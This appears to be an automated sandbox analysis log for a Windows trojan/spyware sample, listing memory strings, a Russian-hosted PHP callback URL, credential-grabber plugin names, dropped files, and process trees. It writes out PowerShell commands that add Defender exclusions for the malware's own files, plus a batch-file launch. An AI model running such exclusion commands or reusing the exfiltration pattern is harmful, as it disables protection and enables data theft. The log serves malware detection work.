Source: powershell.exe, 00000004.00000002.2056323466.0000026C5E707000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mic
Source: powershell.exe, 00000004.00000002.2056323466.0000026C5E707000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micft.cMicRosof
Source: powershell.exe, 00000010.00000002.2386879324.0000020D7C6EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.v
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.00000000052BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f1070307.xsph.ru
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E4A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f1070307.xsph.ru/
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.00000000052BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f1070307.xsph.ru/3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenW
Source: powershell.exe, 00000004.00000002.1939782701.0000026C56206000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2347549043.0000020390076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2226988178.0000020D10079000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2334590989.000001CEC933A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000011.00000002.1778046559.000001CEB94E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.1736753439.0000026C463B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1786141828.0000020380228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1760083564.0000020D00227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1778046559.000001CEB94E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: ogVinh0jhq.exe, 00000000.00000002.1679368399.00000000027BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1736753439.0000026C46191000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1786141828.0000020380001000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, ogVinh0jhq.exe, 0000000A.00000002.1725669334.0000000002D04000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1760083564.0000020D00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1778046559.000001CEB92C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.1736753439.0000026C463B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1786141828.0000020380228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1760083564.0000020D00227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1778046559.000001CEB94E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000011.00000002.1778046559.000001CEB94E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000010.00000002.2402637553.0000020D7C830000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 00000005.00000002.2485281587.00000203F3607000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: RuntimeBroker.exe, 00000008.00000002.3173879576.0000000013547000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.0000000013477000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.00000000135C1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.00000000133DF000.00000004.00000800.00020000.00000000.sdmp, DZLVMXtbhJ.8.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: ogVinh0jhq.exe, 00000000.00000002.1704845134.000000001D884000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/Vh5j3k
Source: ogVinh0jhq.exe, 00000000.00000002.1704845134.000000001D884000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirm
Source: powershell.exe, 00000004.00000002.1736753439.0000026C46191000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1786141828.0000020380001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1760083564.0000020D00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1778046559.000001CEB92C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: RuntimeBroker.exe, 00000008.00000002.3173879576.0000000013547000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.0000000013477000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.00000000135C1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.00000000133DF000.00000004.00000800.00020000.00000000.sdmp, DZLVMXtbhJ.8.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RuntimeBroker.exe, 00000008.00000002.3173879576.0000000013547000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.0000000013477000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.00000000135C1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.00000000133DF000.00000004.00000800.00020000.00000000.sdmp, DZLVMXtbhJ.8.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RuntimeBroker.exe, 00000008.00000002.3173879576.0000000013547000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.0000000013477000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.00000000135C1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.00000000133DF000.00000004.00000800.00020000.00000000.sdmp, DZLVMXtbhJ.8.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000011.00000002.2334590989.000001CEC933A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000011.00000002.2334590989.000001CEC933A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000011.00000002.2334590989.000001CEC933A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: RuntimeBroker.exe, 00000008.00000002.3173879576.0000000013547000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.0000000013477000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.00000000135C1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.00000000133DF000.00000004.00000800.00020000.00000000.sdmp, DZLVMXtbhJ.8.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RuntimeBroker.exe, 00000008.00000002.3173879576.0000000013547000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.0000000013477000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.00000000135C1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.00000000133DF000.00000004.00000800.00020000.00000000.sdmp, DZLVMXtbhJ.8.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RuntimeBroker.exe, 00000008.00000002.3173879576.0000000013547000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.0000000013477000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.00000000135C1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.00000000133DF000.00000004.00000800.00020000.00000000.sdmp, DZLVMXtbhJ.8.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000011.00000002.1778046559.000001CEB94E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.1939782701.0000026C56206000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2347549043.0000020390076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2226988178.0000020D10079000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2334590989.000001CEC933A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: RuntimeBroker.exe, 00000008.00000002.3173879576.0000000013547000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.0000000013477000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.00000000135C1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.00000000133DF000.00000004.00000800.00020000.00000000.sdmp, DZLVMXtbhJ.8.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: RuntimeBroker.exe, 00000008.00000002.3173879576.0000000013547000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.0000000013477000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.00000000135C1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.00000000133DF000.00000004.00000800.00020000.00000000.sdmp, DZLVMXtbhJ.8.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443

Source: unknown

HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.4:49730 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: TC:\Program Files (x86)\autoit3\Examples\Helpfile\_WinAPI_RegisterRawInputDevices.au3

memstr_018fded6-2

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe

Process information set: 01 00 00 00

Jump to behavior

Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Code function: 0_2_00007FFD9B8B3545	0_2_00007FFD9B8B3545
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Code function: 0_2_00007FFD9B8B92A3	0_2_00007FFD9B8B92A3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFD9B9530E9	4_2_00007FFD9B9530E9
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Code function: 9_2_00007FFD9B8B3545	9_2_00007FFD9B8B3545
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Code function: 10_2_00007FFD9B883545	10_2_00007FFD9B883545
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Code function: 10_2_00007FFD9B8892A3	10_2_00007FFD9B8892A3
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Code function: 14_2_00007FFD9B883545	14_2_00007FFD9B883545
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Code function: 15_2_00007FFD9B8A3545	15_2_00007FFD9B8A3545
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Code function: 24_2_00007FFD9B873545	24_2_00007FFD9B873545
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Code function: 24_2_00007FFD9B8792A3	24_2_00007FFD9B8792A3
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Code function: 25_2_00007FFD9B8B3545	25_2_00007FFD9B8B3545
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Code function: 27_2_00007FFD9B8A3545	27_2_00007FFD9B8A3545
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Code function: 27_2_00007FFD9B8A92A3	27_2_00007FFD9B8A92A3
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Code function: 30_2_00007FFD9B8A3545	30_2_00007FFD9B8A3545
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Code function: 31_2_00007FFD9B873545	31_2_00007FFD9B873545
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Code function: 32_2_00007FFD9B8A3545	32_2_00007FFD9B8A3545
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Code function: 33_2_00007FFD9B8B3545	33_2_00007FFD9B8B3545
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Code function: 34_2_00007FFD9B883545	34_2_00007FFD9B883545

Source: ogVinh0jhq.exe	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: RuntimeBroker.exe.0.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970

Source: ogVinh0jhq.exe, 00000000.00000002.1679003510.0000000002470000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameOBSGrabber.dclib4 vs ogVinh0jhq.exe
Source: ogVinh0jhq.exe, 00000000.00000002.1677183636.00000000009A0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameBlockInputPlugin.dclib4 vs ogVinh0jhq.exe
Source: ogVinh0jhq.exe, 00000000.00000002.1679368399.00000000026B3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename( vs ogVinh0jhq.exe
Source: ogVinh0jhq.exe, 00000000.00000002.1679292634.0000000002490000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilename( vs ogVinh0jhq.exe
Source: ogVinh0jhq.exe, 00000000.00000002.1678751837.0000000002460000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilename( vs ogVinh0jhq.exe
Source: ogVinh0jhq.exe, 00000000.00000002.1679368399.00000000025C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBlockInputPlugin.dclib4 vs ogVinh0jhq.exe
Source: ogVinh0jhq.exe, 00000000.00000002.1679368399.00000000025C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBSoDProtection.dclib4 vs ogVinh0jhq.exe
Source: ogVinh0jhq.exe, 00000000.00000002.1679368399.00000000025C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBuildInstallationTweaksPlugin.dll\ vs ogVinh0jhq.exe
Source: ogVinh0jhq.exe, 00000000.00000002.1679271186.0000000002480000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameVPNGrabber.dclib4 vs ogVinh0jhq.exe
Source: ogVinh0jhq.exe, 00000000.00000002.1679368399.0000000002658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename( vs ogVinh0jhq.exe
Source: ogVinh0jhq.exe, 00000000.00000002.1678515626.0000000002440000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilename( vs ogVinh0jhq.exe
Source: ogVinh0jhq.exe, 00000000.00000002.1704845134.000000001D884000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFileName]d"S vs ogVinh0jhq.exe
Source: ogVinh0jhq.exe, 00000000.00000002.1677424458.0000000000C10000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameBSoDProtection.dclib4 vs ogVinh0jhq.exe
Source: ogVinh0jhq.exe, 00000000.00000002.1677659053.0000000002410000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilename$ vs ogVinh0jhq.exe
Source: ogVinh0jhq.exe, 00000000.00000002.1704081402.000000001B5F1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs ogVinh0jhq.exe
Source: ogVinh0jhq.exe, 00000000.00000002.1677730889.0000000002430000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameBuildInstallationTweaksPlugin.dll\ vs ogVinh0jhq.exe
Source: ogVinh0jhq.exe, 00000000.00000000.1643494584.0000000000226000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs ogVinh0jhq.exe
Source: ogVinh0jhq.exe, 00000000.00000002.1681720996.00000000125CF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename$ vs ogVinh0jhq.exe
Source: ogVinh0jhq.exe, 00000000.00000002.1679368399.0000000002696000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameOBSGrabber.dclib4 vs ogVinh0jhq.exe
Source: ogVinh0jhq.exe, 00000000.00000002.1679368399.0000000002696000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameVPNGrabber.dclib4 vs ogVinh0jhq.exe
Source: ogVinh0jhq.exe, 0000000A.00000002.1725669334.0000000002C1E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename( vs ogVinh0jhq.exe
Source: ogVinh0jhq.exe, 0000000A.00000002.1749529025.000000001BC6B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs ogVinh0jhq.exe
Source: ogVinh0jhq.exe, 0000000A.00000002.1725669334.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename( vs ogVinh0jhq.exe
Source: ogVinh0jhq.exe, 0000000A.00000002.1730237722.0000000013240000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename$ vs ogVinh0jhq.exe
Source: ogVinh0jhq.exe, 0000000A.00000002.1725669334.0000000002B11000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBlockInputPlugin.dclib4 vs ogVinh0jhq.exe
Source: ogVinh0jhq.exe, 0000000A.00000002.1725669334.0000000002B11000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBSoDProtection.dclib4 vs ogVinh0jhq.exe
Source: ogVinh0jhq.exe, 0000000A.00000002.1725669334.0000000002B11000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBuildInstallationTweaksPlugin.dll\ vs ogVinh0jhq.exe
Source: ogVinh0jhq.exe, 0000000A.00000002.1725669334.0000000002C0C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameOBSGrabber.dclib4 vs ogVinh0jhq.exe
Source: ogVinh0jhq.exe, 0000000A.00000002.1725669334.0000000002C0C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameVPNGrabber.dclib4 vs ogVinh0jhq.exe
Source: ogVinh0jhq.exe	Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs ogVinh0jhq.exe

Source: ogVinh0jhq.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: ogVinh0jhq.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: RuntimeBroker.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: ogVinh0jhq.exe, FgFRgPsVC58hSPIaWZ5.cs	Cryptographic APIs: 'TransformBlock'
Source: ogVinh0jhq.exe, FgFRgPsVC58hSPIaWZ5.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: ogVinh0jhq.exe, wpPecfWpqrBtg6PNoTR.cs	Cryptographic APIs: 'CreateDecryptor'
Source: ogVinh0jhq.exe, wpPecfWpqrBtg6PNoTR.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.ogVinh0jhq.exe.26b7f98.11.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.ogVinh0jhq.exe.2638b58.13.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.ogVinh0jhq.exe.265d1b8.10.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.ogVinh0jhq.exe.2480000.8.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.ogVinh0jhq.exe.2490000.9.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.ogVinh0jhq.exe.2460000.6.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@34/42@2/2

Source: C:\Users\user\Desktop\ogVinh0jhq.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\6343f6d8546148456354c61b05d8814229b93f4c
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6160:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8132:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7604:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7620:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8120:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wlw1bghy.c1l.ps1

Jump to behavior

Source: C:\Users\user\Desktop\ogVinh0jhq.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TJHXkWh8sx.bat"

Source: ogVinh0jhq.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: ogVinh0jhq.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%

Source: C:\Users\user\Desktop\ogVinh0jhq.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Users\user\Desktop\ogVinh0jhq.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\ogVinh0jhq.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: B2IYoEtgGz.8.dr, jxuhyalTAq.8.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: ogVinh0jhq.exe

ReversingLabs: Detection: 78%

Source: C:\Users\user\Desktop\ogVinh0jhq.exe

File read: C:\Users\user\Desktop\ogVinh0jhq.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\ogVinh0jhq.exe "C:\Users\user\Desktop\ogVinh0jhq.exe"
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ogVinh0jhq.exe'
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/user/AppData/Local/Microsoft/Windows/Explorer\RuntimeBroker.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe C:/Users/user/AppData/Local/Microsoft/Windows/Explorer\RuntimeBroker.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe C:/Users/user/AppData/Local/Microsoft/Windows/Explorer\RuntimeBroker.exe
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process created: C:\Users\user\Desktop\ogVinh0jhq.exe "C:\Users\user\Desktop\ogVinh0jhq.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe C:/Users/user/AppData/Local/Microsoft/Windows/Explorer\ITlIQtTGhEyfMRHaLp.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe C:/Users/user/AppData/Local/Microsoft/Windows/Explorer\ITlIQtTGhEyfMRHaLp.exe
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ogVinh0jhq.exe'
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/user/AppData/Local/Microsoft/Windows/Explorer\ITlIQtTGhEyfMRHaLp.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TJHXkWh8sx.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
